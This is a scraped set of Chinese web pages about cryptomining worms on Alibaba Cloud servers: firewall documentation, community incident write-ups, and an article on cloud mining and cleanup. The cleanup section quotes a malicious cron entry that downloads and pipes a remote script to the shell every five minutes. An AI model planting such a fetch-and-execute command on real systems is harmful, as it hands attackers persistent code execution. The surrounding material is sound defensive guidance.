Analysis)能力提供失陷感知功能,能够及时并有效发现挖矿蠕虫感染事件。利用云上强大的威胁情报网,云防火墙可以及时发现常见货币的矿池地址、检测挖矿木马下载行为和常见矿池通信协议,实时识别主机挖矿行为,并及时告警。您可通过开启云防火墙失陷感知功能的一键防御来检测挖矿蠕虫,并在网络端阻断挖矿木马与矿池通信。开启云防火墙入侵检测一键防御步骤如下:登录云防火墙控制台。在左侧导航栏,选择攻击防护 > 失陷感知。在失陷感知页面,定位到列表中具体事件,单击操作列详情。您可以在事件详情面板,查看该挖矿程序的外联地址。登录检测到挖矿程序的服务器,定位到挖矿进程并进行快速清理。入侵后如何使用云防火墙快速止血如果服务器已感染挖矿蠕虫,云防火墙可以从恶意文件下载阻断、中控通信拦截、重点业务区加强访问控制三方面控制蠕虫进一步传播、减少业务和数据的损失。恶意文件下载阻断服务器在感染挖矿蠕虫后通常会进行恶意文件下载。云防火墙基础防御功能集成恶意文件检测能力,实时更新常见挖矿蠕虫的各类恶意文件唯一性特征码和文件模糊hash,在挖矿蠕虫入侵成功、进一步下载更新的攻击载荷时,会对下载至服务器的文件在流量中进行文件还原及特征匹配等安全检测,在检测到尝试下载恶意文件时进行告警并拦截。您可以在防护配置页面,开启基础防御开关,对恶意文件下载进行拦截。中控通信拦截在感染挖矿蠕虫后,针对挖矿蠕虫可能和C&C控制端进行通信,接收进一步的恶意行为指令或者向外泄露敏感数据等,云防火墙的基础防御功能通过以下方面对该行为进行实时拦截: 通过分析和监控全网蠕虫数据和中控服务器通讯流量,可以对异常通讯流量特征化,落地形成中控通信检测特征,通过实时监控中控通信变化,不断地提取攻击特征,确保及时检测到攻击行为。通过自动学习历史流量访问信息,建立异常流量检测模型,挖掘潜在的未知挖矿蠕虫信息。利用大数据可视化技术对全网IP访问行为关系进行画像,利用机器学习发现异常IP及访问域,并联动全网攻击数据,最终落地形成中控威胁情报库,从而可以对服务器流量通信进行情报匹配,实时拦截恶意的中控连接通信。您可以开启云防火墙的防护配置 > 基础防御,对中控通信进行拦截。为重点业务区开启强访问控制重点业务通常需要对整个互联网开放服务或端口,而来自互联网的扫描、攻击会对企业的资产形成威胁,对外部的访问控制很难做到细粒度管控。而对某一台ECS、某一个EIP或内部网络主动外联场景下,域名或IP数量其实都是可控的,因为该类外联通常都是进行合法的外联访问。因此通过出方向的域名或IP访问控制,可有效防止ECS主机被入侵之后,利用恶意域名植入挖矿木马或木马与C&C进行通信等行为。云防火墙支持对访问来源域名(含泛域名)、IP地址设置访问控制规则。针对重点业务的安全问题,可以通过配置一个强粒度的内到外访问控制策略,即重要业务端口只允许特定域名或者特定的IP进行访问,其他一律禁止。通过该操作可以有效地杜绝挖矿蠕虫下载、对外传播,防止入侵后阶段的维持与获利。例如内网对外访问的总IP数为6个,其中NTP全部标识为阿里云产品,而DNS为我们所熟知的8.8.8.8,通过云防火墙的安全建议,我们可以将上述6个IP进行放行,而对其他IP访问进行全部拒绝。通过如上的配置,在不影响正常业务访问的情况下,防止其他对外连接行为,如恶意下载、C&C通信等。您可以在云防火墙的访问控制 > 互联网边界防火墙页面的出向页签,创建出方向访问控制策略,对可信的外网IP进行放行,而对其他IP访问全部拒绝。由于互联网上持续存在的通用应用漏洞、0 Day漏洞的频发,以及挖矿变现的高效率,挖矿蠕虫大规模蔓延。云上客户可以透明接入云防火墙,保护自身应用不受互联网上各种恶意攻击的威胁。同时依托云上海量的计算能力,能够更快地感知最新的攻击威胁、并且联动全网的威胁情报,使用户免于挖矿蠕虫威胁。云防火墙可以伴随业务水平弹性扩容,让您更多地关注业务的扩展,无需花费更多精力投入在安全上。
反馈本页导读 (1)文档反馈
为什么选择阿里云什么是云计算全球基础设施技术领先稳定可靠安全合规分析师报告产品和定价全部产品免费试用产品动态产品定价价格计算器云上成本管理解决方案技术解决方案文档与社区文档开发者社区天池大赛培训与认证权益中心免费试用高校计划企业扶持计划推荐返现计划支持与服务基础服务企业增值服务迁云服务官网公告健康看板信任中心关注阿里云关注阿里云公众号或下载阿里云APP,关注云资讯,随时随地运维管控云服务售前咨询:95187-1售后服务:400-80-13260法律声明Cookies政策廉正举报安全举报联系我们加入我们阿里巴巴集团淘宝网天猫全球速卖通阿里巴巴国际交易市场1688阿里妈妈飞猪阿里云计算AliOS万网高德UC友盟优酷钉钉支付宝达摩院淘宝海外阿里云盘饿了么© 2009-2024 Aliyun.com 版权所有 增值电信业务经营许可证: 浙B2-20080101 域名注册服务机构许可: 浙D3-20210002 京D3-20220015浙公网安备 33010602009975号浙B2-20080101-4
阿里云服务器被提醒有挖矿进程 该怎么处理-阿里云开发者社区
阿里云服务器被提醒有挖矿进程 该怎么处理-阿里云开发者社区
产品解决方案文档与社区权益中心定价云市场合作伙伴支持与服务了解阿里云联系我们4008013260售前咨询售后服务其他服务我要建议我要投诉备案控制台开发者社区首页探索云世界探索云世界云上快速入门,热门云上应用快速查找了解更多问产品动手实践考认证TIANCHI大赛活动广场活动广场丰富的线上&线下活动,深入探索云世界任务中心做任务,得社区积分和周边高校计划让每位学生受益于普惠算力训练营资深技术专家手把手带教话题畅聊无限,分享你的技术见解开发者评测最真实的开发者用云体验乘风者计划让创作激发创新阿里云MVP遇见技术追梦人直播技术交流,直击现场下载下载海量开发者使用工具、手册,免费下载镜像站极速、全面、稳定、安全的开源镜像技术资料开发手册、白皮书、案例集等实战精华插件为开发者定制的Chrome浏览器插件探索云世界新手上云云上应用构建云上数据管理云上探索人工智能云计算弹性计算无影存储网络倚天云原生容器serverless中间件微服务可观测消息队列数据库关系型数据库NoSQL数据库数据仓库数据管理工具PolarDB开源向量数据库热门Modelscope模型即服务弹性计算云原生数据库物联网云效DevOps龙蜥操作系统平头哥钉钉开放平台大数据大数据计算实时数仓Hologres实时计算FlinkE-MapReduceDataWorksElasticsearch机器学习平台PAI智能搜索推荐人工智能机器学习平台PAI视觉智能开放平台智能语音交互自然语言处理多模态模型pythonsdk通用模型开发与运维云效DevOps钉钉宜搭支持服务镜像站码上公益
开发者社区
安全
文章
正文
阿里云服务器被提醒有挖矿进程 该怎么处理
2021-12-21
3428
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云服务器 ECS,每月免费额度280元 3个月
推荐场景:
部署并使用Docker
快速搭建云上博客
搭建微信小程序
云服务器ECS,u1 2核4GB 1个月
推荐场景:
搭建2048小游戏
搭建turtle画布
搭建wiki知识库
简介:
阿里云ECS服务器是目前很多网站客户在使用的,可以使用不同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间收到客户的安全求助,说是收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。客户网站都无法正常的打开,卡的连服务器SSH远程连接都进不去,给客户造成了很大的影响。
网站安全
目录
热门文章
最新文章
为什么选择阿里云什么是云计算全球基础设施技术领先稳定可靠安全合规分析师报告产品和定价全部产品免费试用产品动态产品定价价格计算器云上成本管理解决方案技术解决方案文档与社区文档开发者社区天池大赛培训与认证权益中心免费试用高校计划企业扶持计划推荐返现计划支持与服务基础服务企业增值服务迁云服务官网公告健康看板信任中心关注阿里云关注阿里云公众号或下载阿里云APP,关注云资讯,随时随地运维管控云服务售前咨询:95187-1售后服务:400-80-13260法律声明Cookies政策廉正举报安全举报联系我们加入我们阿里巴巴集团淘宝网天猫全球速卖通阿里巴巴国际交易市场1688阿里妈妈飞猪阿里云计算AliOS万网高德UC友盟优酷钉钉支付宝达摩院淘宝海外阿里云盘饿了么© 2009-2024 Aliyun.com 版权所有 增值电信业务经营许可证: 浙B2-20080101 域名注册服务机构许可: 浙D3-20210002 京D3-20220015浙公网安备 33010602009975号浙B2-20080101-4
阿里云服务器怎么挖矿(阿里云服务器挖矿教程) - 云服务器网
阿里云服务器怎么挖矿(阿里云服务器挖矿教程) - 云服务器网
云服务器网:购买云服务器和VPS必上的网站!
云测速 | 站长工具箱 | 小爱AI助手 |
云市场大全 | 合作赞助 | 给我投稿
云服务器
腾讯云服务器
阿里云服务器
百度云服务器
金山云服务器
华为云服务器
易探云服务器
京东云服务器
海外云服务器
VPS主机
国内vps主机
香港vps主机
美国vps主机
韩国vps主机
日本vps主机
新加坡vps主机
台湾vps主机
欧洲vps主机
独立服务器
国内服务器
香港服务器
美国服务器
台湾服务器
韩国服务器
日本服务器
欧洲服务器
新加坡服务器
免费资源
免费源码
免费模板
免费插件
实用软件
免费建站
免费云主机
知识大全
VPS教程
虚拟主机
域名知识
主机评测
建站知识
CDN加速
服务器安全
服务器知识
技术文档
主题模板
IDC推荐
搜索
收起
搜索
阿里云
腾讯云
百度云
华为云
金山云
天翼云
易探云
京东云
UCloud
亚马逊云
阿里云服务器怎么挖矿(阿里云服务器挖矿教程)
专栏
yuntue
2023年11月5日
评论
本文目录:1、阿里云允许用云主机挖矿吗2、云服务器挖矿践行 第一篇3、阿里云服务器被挖矿了怎么办?(纯纯电脑小白4、如何用Linux服务器挖矿教程阿里云允许用云主机挖矿吗是可以的。很多挖矿项目都可以使用云服务器,例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐,然而目前
本文目录:
1、阿里云允许用云主机挖矿吗
2、云服务器挖矿践行 第一篇
3、阿里云服务器被挖矿了怎么办?(纯纯电脑小白
4、如何用Linux服务器挖矿教程
阿里云允许用云主机挖矿吗
是可以的。很多挖矿项目都可以使用云服务器,例如最近火热的Swarm bzz。但Swarm白皮书没有提供挖矿的硬件配置推荐,然而目前,因为各类硬件采购价格高、到货慢,然而时间不等人!综合对比下来,针对BZZ挖矿,推荐云服务器!
像Swarm BZZ这样的去中心化存储的情况下,以太坊生态中的热点数据每秒都在随时被调用和存储,所以除了CPU、内存和硬盘这三个主要的响应能力之外,还有一个要求宽带传输速度。
使用云服务器来部署bzz节点,核心理由就是一个字“快”,节点早一分钟上线,就能更早的获取到头矿!
经西部数码上千bzz节点部署的实践经验证明,bzz节点需要较高的带宽和超强的磁盘IO性能,以下是结合资源实际消耗情况合理搭配的配置。
4核CPU + 4G内存 + 100G SSD硬盘 + 20M带宽。上述配置,可以部署一个节点。
如果需要部署多节点可以选择多台这样的云服务器,或者选择更高配置的云服务器,如16核CPU + 24G内存 + 500G SSD硬盘 + 200M带宽,可部署5-10个节点。
云服务器挖矿践行 第一篇
三天以前看到壮乡金荣仔的文章,从中了解到可以利用阿里云服务器进行挖矿,收益可观,于是立即和作者进行了联系,咨询拜师的事情。
通过和孙师傅交流发现,因为写作让我们有了很多共同交流的基础,并且我居然已经关注了孙师傅有好几个月的时间了,这让我们很快建立了信任。
孙师傅在文章中提到正式收徒弟还要等一段时间,我觉得这段时间也不能浪费,还应该为将来拜师以后做一点准备工作。于是我立即开始对云服务挖矿这件事情进行了认真的思考并实践。
云服务挖矿的可行性,大概有这么几个方面。
一,云服务器挖矿的成本收益分析。
成本构成:挖矿的成本主要有三项,矿机的支出,电费,场地及相关管理费用;
收益构成:挖矿的收益主要来自两个方面,一是按照当前数字货币的法币价格可以不管成本而获得的收益,二是数字货币在未来增值获得的收益。
分析:云服务器的运算能力远远低于实体矿机,但是不用支付电费,这是最大的成本节省,另外,由于不需要场地,自己远程管理,场地和管理费用也趋近于零。
因此在算力有限的情况下,云服务器挖矿最大限度地消除了电费和场地的费用,这是这项技术的优势所在。而盈利的平衡点,将极大的取决于服务器费用的支出和当前币价的相对关系。
二,云服务器和挖矿币种的分析。
云服务器的种类有很多,主要分两种,CPU型和GPU型。
目前市场上的各种虚拟币算法也分两类,GPU友好型和CPU有好型。比特币以太坊,莱特币等绝大多数币种都属于GPU友好型,CPU友好型比较少,我了解到的只有大零币zec,小零币xzc,门罗币xmr。
所以这样一来,在服务器和币种的选择问题上,方向很清晰:CPU和GPU任何一个方向,选择算力性价比最高的云服务器和挖矿收益最高的币种。
三,实践。
李笑来的文章中提到过,任何挖矿的行为都不如直接到市场上去买来得容易。我也因此在之前的虚拟货币的学习中,很少关注挖矿的知识。同时对于服务器方面的知识也了解很少,所以一开始我只能用网络上能够搜索得到的办法进行实践, 以快速入门,开始积累。
网上能够直接搜索到的就是利用CPU服务器挖掘门罗币。文章链接如下。
于是我花了391.5元购买了三个月的阿里云轻量型服务器,配置如下。阿里云目前在搞活动,首单可以打七折。
开始进行实践。
经过了两天的折腾,终于在运行服务器上挖矿成功,但是算力只有140h/s,在这个算力下,要亏本一半。
具体折腾的过程中,遇到坑无数,也麻烦了我搞计算机的朋友很多,这个过程留待下一篇再写吧。
四,关于风险的思考。
目前来看,用云服务器挖矿服务器的价格是预付的,并且是固定的,所以挖矿是否有收益,取决于目前的虚拟货币的价格。从孙师傅的截图来看,目前收益还是很可观的。
近期的风险来自于币价的下跌,远期的风险来看,就是阿里云服务器会禁止挖矿行为。阿里云对于挖矿的行为,在网上有过很多的声明。在搜索服务器挖矿相关知识的时候,也发现有国外的服务器禁止挖矿。
长期来看,如果目前云服务器挖矿不赔本那么未来大概率是会有很大的收益的。
就在写这一篇的过程中,孙师傅的收徒标也发出来了,很快就要收徒弟啦。我也正好把这一篇当做我第一这周的作业。
阿里云服务器被挖矿了怎么办?(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
如何用Linux服务器挖矿教程
Linux服务器挖矿,只需要两步
打开 网站,输入手机号,选择你要使用多少CPU来挖矿,默认为使用50%的CPU进行挖矿,点击生成你的专属命令并复制
进入控制台粘贴命令,并点击运行
就是这么操作简单。
本文来源:https://www.yuntue.com/post/164491.html | 云服务器网,转载请注明出处!
继续浏览有关: 阿里云服务器怎么挖矿的文章
给这篇文章的作者打赏
微信扫一扫打赏
支付宝扫一扫打赏
×
打赏
关于作者: yuntue
云服务器(www.yuntue.com)是一家专门做阿里云服务器代金券、腾讯云服务器优惠券的网站,这里你可以找到阿里云服务器、腾讯云服务器等国内主流云服务器优惠价格,以及海外云服务器、vps主机等优惠信息,我们会为你提供性价比最高的云服务器和域名、数据库、CDN、免费邮箱等企业常用互联网资源。
为您推荐
印尼原生IP:保护本土文化传承的重要措施
阿里云服务器如何打开端口?
腾讯云MySQL价格优惠快讯
华为云建站,让你的网站开张大吉
WordPress中文博客主题推荐
高性能韩国原生VPS,助力您的互联网之路!
发表回复 取消回复您的电子邮箱地址不会被公开。 必填项已用*标注评论 * 显示名称 *
电子邮箱地址 *
网站地址
在此浏览器中保存我的显示名称、邮箱地址和网站地址,以便下次评论时使用。
互动交流
粉丝QQ交流一群:2676698
广告赞助联系QQ:38931461
唯一投稿邮箱:点击投稿
● 腾讯云新企业1元注册.com域名
● 腾讯云企业建站1元钱
● 腾讯云全球购(海外免备案服务器)
● 腾讯云校园服务器2核4G3M,468元/年
● 腾讯云上云回馈专场:云产品5折起
● 阿里云万网域名1元购活动
● 阿里云续费/升级代金券领取
● 阿里云网站建设低至500元起
● 阿里云商标顾问注册680元起
● 阿里云老用户自定义购买3.5折
近期文章
香港vps如何搭建跨境电商?跨境电商为什么要选香港vps主机?
【衡天云】2024跨年礼遇,海外云服务器15元起,海外服务器466元,续费同价
OneTechCloud易科云:香港CN2&香港CMI/美国CN2 GIA&9929 VPS,月付9折季付8折
2024华为云开年采购季:4核16G云服务器24元/月起,附万元大礼包
十大香港VPS推荐,选择一个适合你的香港VPS主机
易探云:香港高防vps主机,4核/4G/5M/50G防御,仅444元/月起
SpartanHost:美国1TB大硬盘VPS月付6美元起,10Gbps大带宽高防VPS八折$4/月起
六六云:日本VPS季付,500Mbps带宽直连大陆优化线路,800GB双向月流量,¥100/季
SpinServers美国服务器:$49/月起-1T大硬盘/10Gbps带宽/美国达拉斯&圣何塞机房
艾云vps:美国vps云主机,圣何塞/西雅图/洛杉矶/纽约/芝加哥vps,最低仅18元/月起
近期评论Wpthems发表在《Ripro8.7破解版-WordPress日主题v8.7完整无限制版下载》哈哈发表在《智简魔方:魔方云系统添加镜像模板(镜像安装)》王光卫博客发表在《网上购买亚马逊云服务器》破解WP发表在《wordpress编辑器插件:Classic Editor编辑器下载》破解WP发表在《WordPress备份插件推荐:备份数据避免网站出错最有效的方法》YUNTUE.COM Inc. 云服务器网 浙ICP备12016336号-20
©CopyRight 2019- 2022 YUNTUE.COM Inc All Rights Reserved 云服务器网(yuntue.com)浙ICP备12016336号-20
浙公网安备33080002000115
返回顶部
云服务器导购
仿站建站技术
微信二维码
阿里云服务器被挖矿怎么解决-阿里云开发者社区
阿里云服务器被挖矿怎么解决-阿里云开发者社区
产品解决方案文档与社区权益中心定价云市场合作伙伴支持与服务了解阿里云联系我们4008013260售前咨询售后服务其他服务我要建议我要投诉备案控制台开发者社区首页探索云世界探索云世界云上快速入门,热门云上应用快速查找了解更多问产品动手实践考认证TIANCHI大赛活动广场活动广场丰富的线上&线下活动,深入探索云世界任务中心做任务,得社区积分和周边高校计划让每位学生受益于普惠算力训练营资深技术专家手把手带教话题畅聊无限,分享你的技术见解开发者评测最真实的开发者用云体验乘风者计划让创作激发创新阿里云MVP遇见技术追梦人直播技术交流,直击现场下载下载海量开发者使用工具、手册,免费下载镜像站极速、全面、稳定、安全的开源镜像技术资料开发手册、白皮书、案例集等实战精华插件为开发者定制的Chrome浏览器插件探索云世界新手上云云上应用构建云上数据管理云上探索人工智能云计算弹性计算无影存储网络倚天云原生容器serverless中间件微服务可观测消息队列数据库关系型数据库NoSQL数据库数据仓库数据管理工具PolarDB开源向量数据库热门Modelscope模型即服务弹性计算云原生数据库物联网云效DevOps龙蜥操作系统平头哥钉钉开放平台大数据大数据计算实时数仓Hologres实时计算FlinkE-MapReduceDataWorksElasticsearch机器学习平台PAI智能搜索推荐人工智能机器学习平台PAI视觉智能开放平台智能语音交互自然语言处理多模态模型pythonsdk通用模型开发与运维云效DevOps钉钉宜搭支持服务镜像站码上公益
开发者社区
数据库
文章
正文
阿里云服务器被挖矿怎么解决
2019-02-11
9665
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云服务器 ECS,每月免费额度280元 3个月
推荐场景:
部署并使用Docker
快速搭建云上博客
搭建微信小程序
云服务器ECS,u1 2核4GB 1个月
推荐场景:
搭建2048小游戏
搭建turtle画布
搭建wiki知识库
简介:
春节刚开始,我们SINE安全,发布了2018年服务器被挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议。
春节刚开始,我们SINE安全,发布了2018年服务器被挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进行了详细的安全分析,为站长以及一些中小企业公司提出了合理的服务器安全防护建议。
在去年的虚拟币市场中,虽然虚拟币经历了暴跌的情况,但是服务器被挖矿的情况还是持续性的增长趋势,背后是一些攻击者利用服务器的漏洞以及网站漏洞进行入侵服务器,拿到服务器权限,在服务器系统里置入木马后门进行挖矿。
下面挖矿的安全报告我们来简要的跟大家分享一下:
去年很多网站系统以及APP应用出现漏洞,PHPCMS 注入漏洞,Thinkphp远程代码执行漏洞,dedecms缓存漏洞,ecshop远程写入漏洞,给整个网络安全带来了很大的危害,关于最新的漏洞利
用以及如何产生的漏洞,我们SINE安全对其公开与分享,对网站的漏洞修复以及补丁,及时的告知与相应,让损失降到最低。我们调查分析发现,从网站漏洞被爆出后到修复漏洞的时间约大,一些网站被攻击的状况就越严重,服务器被挖矿的事情就会发生,如果及时的修复漏洞,那么就可以避免被挖矿。
关于服务器被挖矿的安全部署与防护策略
服务器被挖矿的情况时有发生,我们要对服务器进行详细的安全部署,对远程登录的端口进行更改,像windows的3389端口,改掉,SSH的22端口也要改掉,管理员的账号密码也要更改为数字+字母+符号+大小写的组合来,避免被暴力猜解。对网站的漏洞进行安全检测,发现漏洞立即进行修复,打补丁。有些网站使用开源的系统,要定期的检查系统是否需要更新。如果使用的阿里云服务器,要经常登录服务器查看阿里云云盾的安全提醒,如果出现webshell安全提示,以及阿里云挖矿提示,挖矿恶意进程等安全提示,要尽快进行处理,如果对安全不是太懂的话,建议找专业的安全公司处理,国内像SINE安全,绿盟,启明星辰,都是比较专业的。对于一些网站管理员的账号密码,也要加强,数据库mysql,sql2008等数据库的管理员账号密码也要更改,对数据库的端口也要禁止对外。
网站安全
目录
热门文章
最新文章
为什么选择阿里云什么是云计算全球基础设施技术领先稳定可靠安全合规分析师报告产品和定价全部产品免费试用产品动态产品定价价格计算器云上成本管理解决方案技术解决方案文档与社区文档开发者社区天池大赛培训与认证权益中心免费试用高校计划企业扶持计划推荐返现计划支持与服务基础服务企业增值服务迁云服务官网公告健康看板信任中心关注阿里云关注阿里云公众号或下载阿里云APP,关注云资讯,随时随地运维管控云服务售前咨询:95187-1售后服务:400-80-13260法律声明Cookies政策廉正举报安全举报联系我们加入我们阿里巴巴集团淘宝网天猫全球速卖通阿里巴巴国际交易市场1688阿里妈妈飞猪阿里云计算AliOS万网高德UC友盟优酷钉钉支付宝达摩院淘宝海外阿里云盘饿了么© 2009-2024 Aliyun.com 版权所有 增值电信业务经营许可证: 浙B2-20080101 域名注册服务机构许可: 浙D3-20210002 京D3-20220015浙公网安备 33010602009975号浙B2-20080101-4
阿里云ECS服务器被植入挖矿木马解决过程分享-阿里云开发者社区
阿里云ECS服务器被植入挖矿木马解决过程分享-阿里云开发者社区
产品解决方案文档与社区权益中心定价云市场合作伙伴支持与服务了解阿里云联系我们4008013260售前咨询售后服务其他服务我要建议我要投诉备案控制台开发者社区首页探索云世界探索云世界云上快速入门,热门云上应用快速查找了解更多问产品动手实践考认证TIANCHI大赛活动广场活动广场丰富的线上&线下活动,深入探索云世界任务中心做任务,得社区积分和周边高校计划让每位学生受益于普惠算力训练营资深技术专家手把手带教话题畅聊无限,分享你的技术见解开发者评测最真实的开发者用云体验乘风者计划让创作激发创新阿里云MVP遇见技术追梦人直播技术交流,直击现场下载下载海量开发者使用工具、手册,免费下载镜像站极速、全面、稳定、安全的开源镜像技术资料开发手册、白皮书、案例集等实战精华插件为开发者定制的Chrome浏览器插件探索云世界新手上云云上应用构建云上数据管理云上探索人工智能云计算弹性计算无影存储网络倚天云原生容器serverless中间件微服务可观测消息队列数据库关系型数据库NoSQL数据库数据仓库数据管理工具PolarDB开源向量数据库热门Modelscope模型即服务弹性计算云原生数据库物联网云效DevOps龙蜥操作系统平头哥钉钉开放平台大数据大数据计算实时数仓Hologres实时计算FlinkE-MapReduceDataWorksElasticsearch机器学习平台PAI智能搜索推荐人工智能机器学习平台PAI视觉智能开放平台智能语音交互自然语言处理多模态模型pythonsdk通用模型开发与运维云效DevOps钉钉宜搭支持服务镜像站码上公益
开发者社区
安全
文章
正文
阿里云ECS服务器被植入挖矿木马解决过程分享
2019-07-12
10545
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云服务器 ECS,每月免费额度280元 3个月
推荐场景:
部署并使用Docker
快速搭建云上博客
搭建微信小程序
云服务器ECS,u1 2核4GB 1个月
推荐场景:
搭建2048小游戏
搭建turtle画布
搭建wiki知识库
简介:
阿里云ECS服务器是目前很多网站我们在使用的,但是如果安全做的不够好,有时候就会被植入木马,例如我们有时候会收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。出现这种情况往往网站都无法正常的打开,卡的连服务器SSH远程连接都进不去,给我们造成了很大的影响。
阿里云ECS服务器是目前很多网站我们在使用的,但是如果安全做的不够好,有时候就会被植入木马,例如我们有时候会收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。
出现这种情况往往网站都无法正常的打开,卡的连服务器SSH远程连接都进不去,给我们造成了很大的影响。
这时候我们就需要对云服务器做安全检测了,登录阿里云的控制平台,通过本地远程进去,发现我们服务器CPU达到百分之100,查看了服务器的CPU监控记录,平常都是在百分之20-35之间浮动,我们TOP查看进程,追踪查看那些进程在占用CPU,通过检查发现,有个进程一直在占用,从上面检查出来的问题,可以判断我们的服务器被植入了挖矿程序,服务器被黑,导致阿里云安全警告有挖矿进程。原来是我们的服务器中了挖矿木马,我们来看下top进程的截图:
我们对占用进程的ID,进行查找,发现该文件是在linux系统的tmp目录下,我们对该文件进行了强制删除,并使用强制删除进程的命令对该进程进行了删除,CPU瞬间降到百分之10,挖矿的根源就在这里,那么黑客是如何攻击服务器,植入挖矿木马程序的呢?通过经验判断,我们的网站可能被篡改了,我们需要立即展开对我们网站的全面安全检测,如何我们使用的是dedecms建站系统,开源的php+mysql数据库架构,对所有的代码以及图片,数据库进行了安全检测,果不其然发现了问题,网站的根目录下被上传了webshell木马文件。
这次服务器被植入挖矿木马程序的漏洞根源就是网站存在漏洞,我们对dedecms的代码漏洞进行了人工修复,包括代码之前存在的远程代码执行漏洞,以及sql注入漏洞都进行了全面的漏洞修复,对网站的文件夹权限进行了安全部署,默认的dede后台帮我们做了修改,以及增加网站后台的二级密码防护。
清除木马后门,对服务器的定时任务里,发现了攻击者添加的任务计划,每次服务器重启以及间隔1小时,自动执行挖矿木马,对该定时任务计划进行删除,检查了linux系统用户,是否被添加其他的root级别的管理员用户,发现没有添加。对服务器的反向链接进行查看,包括恶意的端口有无其他IP链接,netstat -an检查了所有端口的安全状况,发现没有植入远程木马后门,对我们的端口安全进行了安全部署,使用iptables来限制端口的流入与流出。
至此我们服务器中挖矿木马的问题才得以彻底的解决,关于挖矿木马的防护与解决办法,总结一下几点:1.定期的对网站程序代码进行安全检测,检查是否有webshell后门,对网站的系统版本定期的升级与漏洞修复,网站的后台登录进行二次密码验证,防止网站存在sql注入漏洞,被获取管理员账号密码,从而登录后台。2.使用阿里云的端口安全策略,对80端口,以及443端口进行开放,其余的SSH端口进行IP放行,需要登录服务器的时候进阿里云后台添加放行的IP,尽可能的杜绝服务器被恶意登录。
如果您也遇到服务器被阿里云提示挖矿程序,不妨按上面的做法试试。
上云活动指导
目录
热门文章
最新文章
为什么选择阿里云什么是云计算全球基础设施技术领先稳定可靠安全合规分析师报告产品和定价全部产品免费试用产品动态产品定价价格计算器云上成本管理解决方案技术解决方案文档与社区文档开发者社区天池大赛培训与认证权益中心免费试用高校计划企业扶持计划推荐返现计划支持与服务基础服务企业增值服务迁云服务官网公告健康看板信任中心关注阿里云关注阿里云公众号或下载阿里云APP,关注云资讯,随时随地运维管控云服务售前咨询:95187-1售后服务:400-80-13260法律声明Cookies政策廉正举报安全举报联系我们加入我们阿里巴巴集团淘宝网天猫全球速卖通阿里巴巴国际交易市场1688阿里妈妈飞猪阿里云计算AliOS万网高德UC友盟优酷钉钉支付宝达摩院淘宝海外阿里云盘饿了么© 2009-2024 Aliyun.com 版权所有 增值电信业务经营许可证: 浙B2-20080101 域名注册服务机构许可: 浙D3-20210002 京D3-20220015浙公网安备 33010602009975号浙B2-20080101-4